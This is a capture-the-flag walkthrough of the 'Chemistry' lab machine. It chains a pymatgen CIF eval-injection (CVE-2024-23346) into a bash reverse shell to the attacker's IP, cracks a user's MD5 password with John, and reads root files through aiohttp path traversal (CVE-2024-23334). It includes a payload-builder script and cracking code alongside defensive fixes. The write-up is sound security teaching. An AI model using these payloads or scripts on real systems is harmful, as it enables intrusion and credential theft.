Chemistry

Chemistry.png

IP Address: 10.10.11.38
OS: Linux
Difficulty: Easy

Recon

First, let's run an nmap scan against the target to identify the open ports and the services behind them.

sudo nmap -sC -sV -vv -T5 10.10.11.38 -oA nmap/chemistry.nmap

We get the following output from the nmap scan.

PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b6:fc:20:ae:9d:1d:45:1d:0b:ce:d9:d0:20:f2:6f:dc (RSA)
|   256 f1:ae:1c:3e:1d:ea:55:44:6c:2f:f2:56:8d:62:3c:2b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLzrl552bgToHASFlKHFsDGrkffR/uYDMLjHOoueMB9HeLRFRvZV5ghoTM3Td9LImvcLsqD84b5n90qy3peebL0=
|   256 94:42:1b:78:f2:51:87:07:3e:97:26:c9:a2:5c:0a:26 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIELLgwg7A8Kh8AxmiUXeMe9h/wUnfdoruCJbWci81SSB
5000/tcp open  http    syn-ack ttl 63 Werkzeug httpd 3.0.3 (Python 3.9.5)
| http-methods: 
|_  Supported Methods: HEAD GET OPTIONS
|_http-title: Chemistry - Home
|_http-server-header: Werkzeug/3.0.3 Python/3.9.5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:21
Completed NSE at 23:21, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:21
Completed NSE at 23:21, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:21
Completed NSE at 23:21, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.45 seconds
           Raw packets sent: 1006 (44.240KB) | Rcvd: 1002 (40.076KB)

The main ports open to us are:

  • Port 22 - SSH
  • Port 5000 - HTTP

Let's map the host to the name chemistry.htb in our /etc/hosts file.

sudo nano /etc/hosts
10.10.11.38 chemistry.htb

Pasted image 20250127232611.png

Save and exit nano with Ctrl + X, then Y, then ENTER.

Now browse to the site using that name:

http://chemistry.htb:5000/

Pasted image 20250127232755.png

The application offers two options, Register or Login, and describes itself as a tool that analyses a file you upload.

So let's register a user and log in.

Pasted image 20250131171629.png

Once logged in, we see a page for uploading a CIF (Crystallographic Information File); an example file is provided for reference.

Pasted image 20250131174704.png

Reference Files:

example.cif
data_Example
_cell_length_a    10.00000
_cell_length_b    10.00000
_cell_length_c    10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta  90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
 _atom_site_label
 _atom_site_fract_x
 _atom_site_fract_y
 _atom_site_fract_z
 _atom_site_occupancy
 H 0.00000 0.00000 0.00000 1
 O 0.50000 0.50000 0.50000 1

CVE-2024-23346 Exploit

Since the server parses the uploaded CIF file, it is worth checking whether the library that does the parsing has a known vulnerability that would give us code execution.

Searching on DuckDuckGo, I find the vulnerability description on the following site.

Pasted image 20250131175304.png

You can read the detailed description of the vulnerability in that blog; our focus here is the proof of concept it provides. CVE-2024-23346 is a code-injection bug in pymatgen, the library that parses the CIF: the value of _space_group_magn.transform_BNS_Pp_abc was handed to eval() by JonesFaithfulTransformation.from_transformation_str(), so a crafted transform string runs arbitrary Python on the server. It is fixed in pymatgen 2024.2.20.

We will use the following part of the PoC in our exploit.

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("touch pwned");0,0,0'

_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "
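To see why the payload has this shape, here is an added example (my reconstruction, not pymatgen's code and not from the original writeup). It mirrors the pre-fix parser's eval(expr, {"__builtins__": None}, {...}) on plain tuples instead of numpy rows, runs the escape with os.getpid() in place of os.system() so it is harmless, and then shows an allow-list evaluator that accepts only + - * / over a, b and c. The names UNIT, vulnerable_parse, safe_component and safe_parse are mine.

```python
"""Root cause of CVE-2024-23346, reconstructed (added example, not pymatgen code).

Before 2024.2.20, pymatgen split the transform string on ';' and ',' and
evaluated each basis term with eval(expr, {"__builtins__": None}, {...}).
Removing __builtins__ is not a sandbox: a literal such as () still reaches
`object`, and from there every loaded class.
"""
import ast

# Unit basis vectors standing in for the numpy rows the real parser uses.
UNIT = {"a": (1.0, 0.0, 0.0), "b": (0.0, 1.0, 0.0), "c": (0.0, 0.0, 1.0)}

# Constructed input: the PoC expression with os.system(...) swapped for
# os.getpid(), so running it is harmless and the result can be checked.
ESCAPE_EXPR = (
    "[d for d in ().__class__.__mro__[1].__getattribute__("
    '*[().__class__.__mro__[1]]+["__sub" + "classes__"])() '
    'if d.__name__ == "BuiltinImporter"][0].load_module("os").getpid()'
)


def vulnerable_component(expr: str):
    """Stand-in for the pre-fix behaviour: eval() with builtins 'removed'.

    ().__class__.__mro__[1] is `object`; object.__getattribute__(object,
    "__subclasses__")() lists every class in the interpreter, among them
    importlib's BuiltinImporter, whose load_module("os") hands back the
    already-imported os module. No builtin name is needed at any step.
    """
    return eval(expr, {"__builtins__": None}, dict(UNIT))


def vulnerable_parse(transformation: str):
    """Split 'a,b,c;0,0,0' into basis terms and origin shift, eval() each term."""
    basis, origin = transformation.split(";")
    P = [vulnerable_component(x.strip()) for x in basis.split(",")]
    p = [float(x) for x in origin.split(",")]
    return P, p


def demonstrate_escape() -> int:
    """Returns the interpreter's PID, obtained through the 'sandboxed' eval."""
    return vulnerable_component(ESCAPE_EXPR)


def _vec(v):
    return isinstance(v, tuple)


def _binop(op, x, y):
    """Arithmetic on scalars and 3-vectors; any other combination is rejected."""
    if isinstance(op, (ast.Add, ast.Sub)):
        s = 1.0 if isinstance(op, ast.Add) else -1.0
        if _vec(x) and _vec(y):
            return tuple(xi + s * yi for xi, yi in zip(x, y))
        if not _vec(x) and not _vec(y):
            return x + s * y
    elif isinstance(op, ast.Mult):
        if _vec(x) and not _vec(y):
            x, y = y, x
        if not _vec(x):
            return tuple(x * yi for yi in y) if _vec(y) else x * y
    elif isinstance(op, ast.Div):
        if not _vec(y):
            return tuple(xi / y for xi in x) if _vec(x) else x / y
    raise ValueError("operand types not allowed for this operator")


def safe_component(expr: str):
    """Allow-list evaluator: only + - * / over numeric literals and a, b, c.

    Attribute access, calls, comprehensions, ** and every other node type are
    rejected before anything is evaluated, so the escape above is a ValueError.
    """
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and type(node.value) in (int, float):
            return float(node.value)
        if isinstance(node, ast.Name) and node.id in UNIT:
            return UNIT[node.id]
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, (ast.UAdd, ast.USub)):
            v = walk(node.operand)
            if isinstance(node.op, ast.UAdd):
                return v
            return tuple(-x for x in v) if _vec(v) else -v
        if isinstance(node, ast.BinOp) and isinstance(node.op, (ast.Add, ast.Sub, ast.Mult, ast.Div)):
            return _binop(node.op, walk(node.left), walk(node.right))
        raise ValueError(f"disallowed syntax: {type(node).__name__}")

    return walk(ast.parse(expr, mode="eval"))


def safe_parse(transformation: str):
    """Drop-in replacement for vulnerable_parse built on safe_component."""
    basis, origin = transformation.split(";")
    P = [safe_component(x.strip()) for x in basis.split(",")]
    p = [float(x) for x in origin.split(",")]
    return P, p


if __name__ == "__main__":
    print("escape through eval() returned PID", demonstrate_escape())
    print("safe parse:", safe_parse("a,b,-a+2*c;0,0,0.5"))
    try:
        safe_component(ESCAPE_EXPR)
    except ValueError as err:
        print("safe_component rejected the payload:", err)
```

Run it and the first line prints the PID obtained without a single builtin; the same expression is refused by safe_component before evaluation. The actual fix in pymatgen replaced eval() with a symbolic-expression parser, which is the same idea: parse, validate against a grammar, then compute.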

Here we replace the argument of .system(), touch pwned, with /bin/bash -c \'sh -i >& /dev/tcp/<IP ADDRESS>/<PORT> 0>&1' (the backslash before the first inner quote is only a Python string escape and changes nothing). The bash -c wrapper matters: os.system() runs the command through /bin/sh, and /dev/tcp redirection is a bash feature. The inner single quotes do not end the CIF value, because a CIF quoted value only terminates at a quote followed by whitespace; keep them glued to the neighbouring characters.

You can generate a different reverse-shell command on RevShells and substitute it for sh -i >& /dev/tcp/<IP ADDRESS>/<PORT> 0>&1, as long as it contains no commas or semicolons (the parser splits the transform string on those) and no double quotes.

Pasted image 20250131180027.png

Our final exploit file (example1.cif) looks like this:

data_Example
_cell_length_a    10.00000
_cell_length_b    10.00000
_cell_length_c    10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta  90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
 _atom_site_label
 _atom_site_fract_x
 _atom_site_fract_y
 _atom_site_fract_z
 _atom_site_occupancy
 H 0.00000 0.00000 0.00000 1
 O 0.50000 0.50000 0.50000 1

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c \'sh -i >& /dev/tcp/10.10.14.128/12345 0>&1'");0,0,0'


_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "
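The odd spacing in the PoC (a space before every "(", and "__sub" + "classes__" instead of __subclasses__) is not cosmetic: before eval(), the parser inserted implicit multiplication signs, and the CIF tokenizer has its own rules (a single-quoted value ends at the first quote followed by whitespace, "#" after whitespace starts a comment, non-ASCII is dropped, and the transform string is split on ";" and ","). The following added script (mine, not the page's; the regexes are reproduced from the pre-fix pymatgen source as I know it) builds example1.cif for a given listener and reports anything in the command that those rules would truncate or rewrite. It does flag the writeup's own command: the rewrite turns /bin/bash into /bin/b*ash, which still works only because sh glob-expands that back to /bin/bash.

```python
"""Build and sanity-check the CVE-2024-23346 CIF payload (added example)."""
import re

# Basis-vector part of the PoC. The space before every "(" and the split
# "__sub" + "classes__" both dodge the implicit-'*' rewrite below.
ESCAPE_TEMPLATE = (
    "[d for d in ().__class__.__mro__[1].__getattribute__ ( "
    '*[().__class__.__mro__[1]]+["__sub" + "classes__"]) () '
    'if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("{cmd}")'
)

# The rest of the CIF, taken from the page's example.cif.
CIF_HEAD = """data_Example
_cell_length_a    10.00000
_cell_length_b    10.00000
_cell_length_c    10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta  90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
 _atom_site_label
 _atom_site_fract_x
 _atom_site_fract_y
 _atom_site_fract_z
 _atom_site_occupancy
 H 0.00000 0.00000 0.00000 1
 O 0.50000 0.50000 0.50000 1
"""

CIF_TAIL = """_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "
"""

# Implicit multiplication inserted before eval(): '*' before '(' after a word
# character, after ')' before a word character, and between a digit/a/b/c and
# a following a/b/c (regex as in the pre-fix pymatgen source).
_IMPLICIT_MULT = re.compile(
    r"(?<=\w|\))(?=\() | (?<=\))(?=\w) | (?<=(\d|a|b|c))(?=([abc]))", re.X
)


def implicit_mult(component: str) -> str:
    return _IMPLICIT_MULT.sub("*", component)


def default_command(lhost: str, lport: int) -> str:
    # bash -c wrapper: os.system() runs through /bin/sh, and /dev/tcp is bash-only.
    return f"/bin/bash -c 'sh -i >& /dev/tcp/{lhost}/{lport} 0>&1'"


def transform_value(cmd: str) -> str:
    """The single-quoted value of _space_group_magn.transform_BNS_Pp_abc."""
    return "'a,b," + ESCAPE_TEMPLATE.format(cmd=cmd) + ";0,0,0'"


def check_payload(cmd: str) -> list:
    """Return warnings for anything that would truncate or mangle the payload."""
    warnings = []
    inner = transform_value(cmd)[1:-1]  # text between the CIF quotes
    if '"' in cmd:
        warnings.append("double quote ends the Python string passed to system()")
    if ";" in cmd or "," in cmd:
        warnings.append("';' or ',' breaks the split into basis terms and origin shift")
    if re.search(r"'(?!\S)", inner):
        warnings.append("single quote followed by whitespace ends the CIF value early")
    if re.search(r"(\s|^)#", inner):
        warnings.append("'#' after whitespace is stripped as a CIF comment")
    if not inner.isascii():
        warnings.append("non-ASCII characters are dropped by the parser")
    rewritten = implicit_mult(cmd)
    if rewritten != cmd:
        warnings.append(f"implicit '*' rewrite changes the command to: {rewritten}")
    return warnings


def build_exploit_cif(lhost: str, lport: int, cmd: str = None) -> str:
    cmd = cmd or default_command(lhost, lport)
    return (CIF_HEAD + "\n_space_group_magn.transform_BNS_Pp_abc  "
            + transform_value(cmd) + "\n\n" + CIF_TAIL)


if __name__ == "__main__":
    import sys
    host, port = sys.argv[1], int(sys.argv[2])  # e.g. 10.10.14.128 12345
    for w in check_payload(default_command(host, port)):
        print("warning:", w)
    with open("example1.cif", "w") as fh:
        fh.write(build_exploit_cif(host, port))
```

Usage: python3 build_cif.py 10.10.14.128 12345 writes example1.cif next to the script; fix any warning before uploading rather than discovering it from a silent parse failure on the server.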

Now start a listener on the attacking machine.

nc -lvnp 12345

Pasted image 20250131180225.png

Now, upload the file to the server from the Dashboard page.

Pasted image 20250131180318.png

Click View. The server parses the uploaded CIF, the eval() fires, and a reverse shell connects back to the listener.

Pasted image 20250131180346.png

Nice!!!!

We land in a shell as the web application's user. The user flag belongs to rosa, and her home directory is not readable from this account.

Pasted image 20250131180530.png

User Flag

Looking around the filesystem, we find a folder named instance in the application user's home directory, which holds a SQLite database (the instance folder is where a Flask application keeps per-deployment data such as its database).

Pasted image 20250131180714.png

Dumping its contents shows user names next to password hashes, and rosa is among them:

Mrosa63ed86ee9f624c7b14f1d4f43dc251a5

Password Hash: 63ed86ee9f624c7b14f1d4f43dc251a5

Pasted image 20250131180836.png

Let's identify the hash type with hashid on the attacking machine.

hashid 63ed86ee9f624c7b14f1d4f43dc251a5

Pasted image 20250131181034.png

hashid lists several candidates, since any 32-hex-character digest (MD5, MD4, NTLM, ...) looks the same; unsalted MD5 is the most likely for a small web application, and a successful crack with John's Raw-MD5 format confirms it. Let's try that against rockyou.txt.

John The Ripper

First, save the hash to a file:

echo "63ed86ee9f624c7b14f1d4f43dc251a5" > password.hash

Pasted image 20250131181308.png

Now run John the Ripper against rockyou.txt (adjust the wordlist path to your system):

john --format=Raw-MD5 --wordlist=~/Pranava__Rao/Tools/FuzzlingList/rockyou.txt password.hash

Pasted image 20250131181500.png

And Here we find the password of the user rosa

Username: rosa
Password: unicorniosrosados
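For reference, the following added example (mine, not the page's; the wordlist is constructed inline as a stand-in for rockyou.txt) shows what john --format=Raw-MD5 is doing, and beside it the salted, iterated PBKDF2 storage that would have made this offline attack impractical.

```python
"""Unsalted MD5 cracking versus salted PBKDF2 storage (added example)."""
import hashlib
import hmac
import os

# Hash recovered from the page's database dump (user rosa).
ROSA_HASH = "63ed86ee9f624c7b14f1d4f43dc251a5"

# Constructed stand-in for rockyou.txt; a real run streams the file line by line.
WORDLIST = ["password", "123456", "unicorn", "rosa1234", "unicorniosrosados"]


def md5_hex(word: str) -> str:
    return hashlib.md5(word.encode()).hexdigest()


def crack_md5(target_hex: str, words):
    """Unsalted MD5: one hash per candidate, no salt, no work factor.

    This is all john has to do for Raw-MD5; on a GPU it runs at billions of
    candidates per second, so any rockyou entry falls in seconds.
    """
    target = target_hex.lower()
    for word in words:
        if hmac.compare_digest(md5_hex(word), target):
            return word
    return None


def crack_rosa(words=WORDLIST):
    return crack_md5(ROSA_HASH, words)


def hash_password(password: str, iterations: int = 600_000, salt: bytes = None) -> str:
    """What the app should store: salted, iterated PBKDF2-HMAC-SHA256.

    The random per-user salt defeats precomputed tables and forces one attack
    per account; the iteration count makes each guess cost real time.
    """
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(stored: str, password: str) -> bool:
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unknown hash scheme")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)  # constant-time comparison


if __name__ == "__main__":
    print("rosa ->", crack_rosa())
    stored = hash_password("unicorniosrosados")
    print(stored)
    print("verify:", verify_password(stored, "unicorniosrosados"))
```

Swap the constructed WORDLIST for a file iterator and crack_md5 is a slow but faithful model of the john run above; the PBKDF2 functions are the shape of the fix on the application side.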

SSH Login

Now log in as rosa over SSH with the recovered password.

Pasted image 20250131181827.png

And Here we find the user flag!!!

Pasted image 20250131181856.png

Root Flag

Let's create a working folder under /tmp on the target.

mkdir /tmp/Hacker

Pasted image 20250131182113.png

Next, let's get LinPEAS onto the target in that folder.

Download LinPEAS to your local machine first:

wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh

Serve it from the attacking machine with Python's built-in HTTP server:

python3 -m http.server 8008

Pasted image 20250131182943.png

On the target, download it into /tmp/Hacker:

wget http://10.10.14.128:8008/linpeas.sh

Pasted image 20250131183126.png

With linpeas.sh on the target, run it to enumerate local privilege-escalation vectors:

bash linpeas.sh

Pasted image 20250131183310.png

In its output we see a service listening only on the loopback interface, on port 8080 (a listening-socket listing such as ss -tlnp shows the same).

Pasted image 20250131183739.png

To reach that service, forward a local port to 127.0.0.1:8080 on the target over SSH.

Open a new terminal and enter the following command, using your VPN (tun0) address and a free local port; this writeup uses 10.10.14.128 and 5555:

ssh -L <Local IP Address>:<Local Port>:localhost:8080 [email protected]

Pasted image 20250131184017.png

Now open your browser at that address and port.

Pasted image 20250131184242.png

We see a static page that displays some monitoring logs. Fuzzing for files and directories turned up nothing useful, but looking at the response headers with curl shows the server is Python/3.9 aiohttp/3.9.1:

curl http://10.10.14.128:5555 --head

Pasted image 20250131192331.png

So let's search for public vulnerabilities affecting that aiohttp version.

We find CVE-2024-23334: aiohttp before 3.9.2 does not verify that a file served from a static route registered with follow_symlinks=True stays inside the configured directory, so ../ sequences in the request path read arbitrary files the server process can access. Reference from NIST:

Pasted image 20250131194024.png

From the earlier directory fuzzing we had already found /assets, a static route, which is exactly what this bug needs.

Pasted image 20250131194149.png

Let's read /etc/passwd through it with curl. The --path-as-is flag stops curl from collapsing the ../ sequences on the client side, so the server receives them verbatim:

curl -s --path-as-is http://10.10.14.128:5555/assets/../../../../../etc/passwd

Pasted image 20250131194651.png
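To show what the server does with that request, here is an added example (my reconstruction of the aiohttp behaviour; not aiohttp's code and not the page's). It builds a temporary assets directory with a secret file next to it and compares the pre-3.9.2 static-file resolution, which skips the containment check when follow_symlinks=True, with a hardened version that normalises the path before checking. No network and no aiohttp install are needed; the tree and the "../secret.txt" filename are constructed here.

```python
"""CVE-2024-23334 path resolution, vulnerable versus hardened (added example)."""
import os
import shutil
import tempfile
from pathlib import Path


def resolve_vulnerable(directory: Path, filename: str, follow_symlinks: bool) -> Path:
    """Reconstruction of the pre-3.9.2 logic: the containment check only runs
    when follow_symlinks is False, so '..' in filename walks out of directory."""
    filepath = directory.joinpath(filename).resolve()
    if not follow_symlinks:
        filepath.relative_to(directory)  # ValueError when outside -> 404
    return filepath


def resolve_fixed(directory: Path, filename: str, follow_symlinks: bool) -> Path:
    """Hardened variant: normalise the unresolved path and require it to stay
    inside directory before touching the filesystem, then resolve symlinks and,
    unless they are explicitly allowed, require the target to stay inside too."""
    normalized = Path(os.path.normpath(directory.joinpath(filename)))
    normalized.relative_to(directory)  # rejects '..' escapes regardless of symlink policy
    filepath = normalized.resolve()
    if not follow_symlinks:
        filepath.relative_to(directory)
    return filepath


def _read(resolver, directory: Path, filename: str, follow_symlinks: bool) -> str:
    try:
        return resolver(directory, filename, follow_symlinks).read_text()
    except ValueError:
        return "blocked"


def demo() -> dict:
    """Constructed tree: assets/style.css is public, secret.txt sits one level up."""
    root = Path(tempfile.mkdtemp()).resolve()
    try:
        assets = root / "assets"
        assets.mkdir()
        (assets / "style.css").write_text("body{}")
        (root / "secret.txt").write_text("flag")
        # What /assets/../secret.txt (sent with --path-as-is) reaches the handler as.
        traversal = "../secret.txt"
        return {
            "vuln_follow": _read(resolve_vulnerable, assets, traversal, True),
            "vuln_nofollow": _read(resolve_vulnerable, assets, traversal, False),
            "fixed_follow": _read(resolve_fixed, assets, traversal, True),
            "fixed_legit": _read(resolve_fixed, assets, "style.css", True),
        }
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:14} -> {outcome}")
```

The vulnerable resolver with follow_symlinks=True returns the secret; with the default follow_symlinks=False the relative_to check stops it, which is why the bug only bites applications that opted into symlink following. The hardened version keeps symlink following but still refuses ../ escapes.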

It works. If the service runs with enough privileges, the same request reads the root flag:

curl -s --path-as-is http://10.10.14.128:5555/assets/../../../../../root/root.txt

Pasted image 20250131195107.png

ROOT FLAG!!!!!!!!!!!!!!


Follow me

Instagram: @Pranava__Rao
Linked: Pranava Rao
X: @Pranava__Rao
GitHub: Pranava Rao
YouTube: @Pranava__Rao